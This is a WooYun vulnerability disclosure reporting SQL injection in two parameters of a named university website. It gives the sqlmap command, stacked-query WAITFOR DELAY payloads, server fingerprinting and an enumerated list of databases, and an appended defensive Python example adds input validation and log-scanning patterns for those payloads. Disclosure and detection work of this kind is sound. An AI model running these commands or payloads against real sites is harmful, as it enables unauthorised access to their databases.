WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reading --------- http://drop.zone.ci/
2015-05-15: Details have been reported to the vendor and are awaiting handling. 2015-05-20: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
Just browsing around, and I found this little hole.
1. python sqlmap.py -u "http://yjsb.gmc.edu.cn/bmzz/index.asp?bmid=13&bmmc=%E5%AD%A6%E4%BD%8D%E5%8A%9E%E5%85%AC%E5%AE%A4" -p bmid
GET parameter 'bmid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
---
Parameter: bmid (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: bmid=13;WAITFOR DELAY '0:0:5'--&bmmc=%E5%AD%A6%E4%BD%8D%E5%8A%9E%E5%85%AC%E5%AE%A4
---
[17:07:42] [INFO] testing Microsoft SQL Server
[17:07:42] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[17:07:49] [INFO] confirming Microsoft SQL Server
[17:07:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[17:07:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[17:07:55] [INFO] fetched data logged to text files under 'C:\Users\wjl\.sqlmap\output\yjsb.gmc.edu.cn'
Haha, one more stacked-query injection:
2. http://yjsb.gmc.edu.cn/yzxx/yjxx.asp?ID=153
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
---
Parameter: ID (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ID=153;WAITFOR DELAY '0:0:5'--
    Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[17:33:35] [INFO] testing Microsoft SQL Server
Databases:
available databases [7]:
[*] gedu
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Enumerating the tables is far too slow!!!
Stopping here.
Filter the input~~
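As an added example (not part of the original report or of the affected site's code), the two defender-side checks that follow from the findings above: an integer allow-list for the bmid/ID parameters, which is the "filter" the fix line calls for, and a scan of IIS 6.0 W3C log lines for the ";WAITFOR DELAY" / ";IF(...)" stacked-query payload sqlmap used. The log lines, client IPs and server IP are constructed for this example; the field order assumes the IIS default W3C layout.

```python
"""Added example, not part of the original WooYun report.  Two defender-side
checks for the stacked-query / time-delay injection shown above:
  validate_numeric_id(): the allow-list filter the fix line asks for --
      'bmid' / 'ID' must be a plain integer, anything else is rejected.
  scan_iis_log(): flags IIS 6.0 W3C log entries whose decoded query string
      carries the ';WAITFOR DELAY' / ';IF(...)' payload sqlmap used.
The log lines, client IPs and server IP below are constructed for this example."""
import re
from typing import Optional
from urllib.parse import unquote_plus

# Constructed IIS W3C lines, default field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2015-05-15 17:07:40 10.0.0.5 GET /bmzz/index.asp bmid=13&bmmc=%E5%AD%A6%E4%BD%8D 80 - 192.0.2.10 sqlmap/1.0 200
2015-05-15 17:07:44 10.0.0.5 GET /bmzz/index.asp bmid=13;WAITFOR+DELAY+'0:0:5'--&bmmc=x 80 - 192.0.2.10 sqlmap/1.0 200
2015-05-15 17:33:35 10.0.0.5 GET /yzxx/yjxx.asp ID=153%3BIF(1%3D1)%20WAITFOR%20DELAY%20'0:0:5'-- 80 - 192.0.2.10 Mozilla/5.0 500
2015-05-15 17:40:01 10.0.0.5 GET /yzxx/yjxx.asp ID=153 80 - 198.51.100.7 Mozilla/5.0 200
"""

# MSSQL stacked-query markers, matched against the URL-decoded query string.
INJECTION_PATTERNS = [
    re.compile(r";\s*(waitfor\s+delay|if\s*\()", re.I),  # ';' ends the statement, then delay/inference
    re.compile(r"--\s*$"),                               # trailing comment swallowing the rest of the query
]

def validate_numeric_id(value: str) -> Optional[int]:
    """Allow-list check for integer id parameters: returns the int, or None when rejected."""
    return int(value) if re.fullmatch(r"\d{1,9}", value) else None

def is_injection_attempt(query: str) -> bool:
    """True when the decoded cs-uri-query contains a stacked-query / delay marker."""
    decoded = unquote_plus(query)
    return any(p.search(decoded) for p in INJECTION_PATTERNS)

def scan_iis_log(text: str) -> list:
    """One record per suspicious GET: client IP, requested page, decoded query."""
    hits = []
    for line in text.splitlines():
        fields = line.split(" ")
        if len(fields) < 11 or fields[3] != "GET":
            continue
        stem, query, client_ip = fields[4], fields[5], fields[8]
        if is_injection_attempt(query):
            hits.append({"client": client_ip, "path": stem, "query": unquote_plus(query)})
    return hits

if __name__ == "__main__":
    print(scan_iis_log(SAMPLE_LOG))
```

The scan flags the two payload requests and leaves the two plain integer requests alone; the same validate_numeric_id() check applied server-side before building the query is what would have closed both injection points.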
Severity: No impact (vendor ignored)
Ignored at: 2015-05-20 11:46
None yet